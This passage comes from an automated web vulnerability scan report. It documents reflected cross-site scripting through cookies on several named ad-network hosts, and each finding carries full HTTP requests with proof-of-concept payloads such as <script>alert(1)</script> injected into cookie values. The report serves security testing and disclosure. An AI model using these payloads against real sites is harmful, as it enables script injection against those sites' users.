Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&987b0<script>alert(1)</script>64c88d49c21; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&987b0<script>alert(1)</script>64c88d49c21=&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&987b0<script>alert(1)</script>64c88d49c21', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 201
...[SNIP]...

3.134. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 8ad1e<script>alert(1)</script>5447c5c1a44 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=18ad1e<script>alert(1)</script>5447c5c1a44; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Exp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '18ad1e<script>alert(1)</script>5447c5c1a44', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

3.135. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55fbe'%3balert(1)//18254b478a was submitted in the cli cookie. This input was echoed as 55fbe';alert(1)//18254b478a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e55fbe'%3balert(1)//18254b478a; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:39 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:39 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:39 GMT
Content-Length: 8188

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-13247778_1304949579","http://ib.adnxs.com/ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-13247778_1304949579,11f8f328940989e55fbe';alert(1)//18254b478a&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet
...[SNIP]...

3.136. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13d37"%3balert(1)//7538a7cb6f was submitted in the cli cookie. This input was echoed as 13d37";alert(1)//7538a7cb6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e13d37"%3balert(1)//7538a7cb6f; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:39 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:39 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:39 GMT
Content-Length: 8188

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f8f328940989e13d37";alert(1)//7538a7cb6f&seg_code=noseg&ord=1304949579",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

3.137. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2652a"-alert(1)-"89c34a552b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=2652a"-alert(1)-"89c34a552b; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64501; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949898^1304949898&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2652a"-alert(1)-"89c34a552b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.138. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 838c4"-alert(1)-"8edc9ca69b8 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=838c4"-alert(1)-"8edc9ca69b8; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64624; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949775^1304949775; expires=Mon, 16-May-2011 14:02:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=838c4"-alert(1)-"8edc9ca69b8\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.139. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9893"-alert(1)-"9508af4cd35 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=a9893"-alert(1)-"9508af4cd35; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:07:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:07:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64374; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950025^1304950025&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:07:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2215

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=a9893"-alert(1)-"9508af4cd35\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.140. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba34e"-alert(1)-"c78825df4d5 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
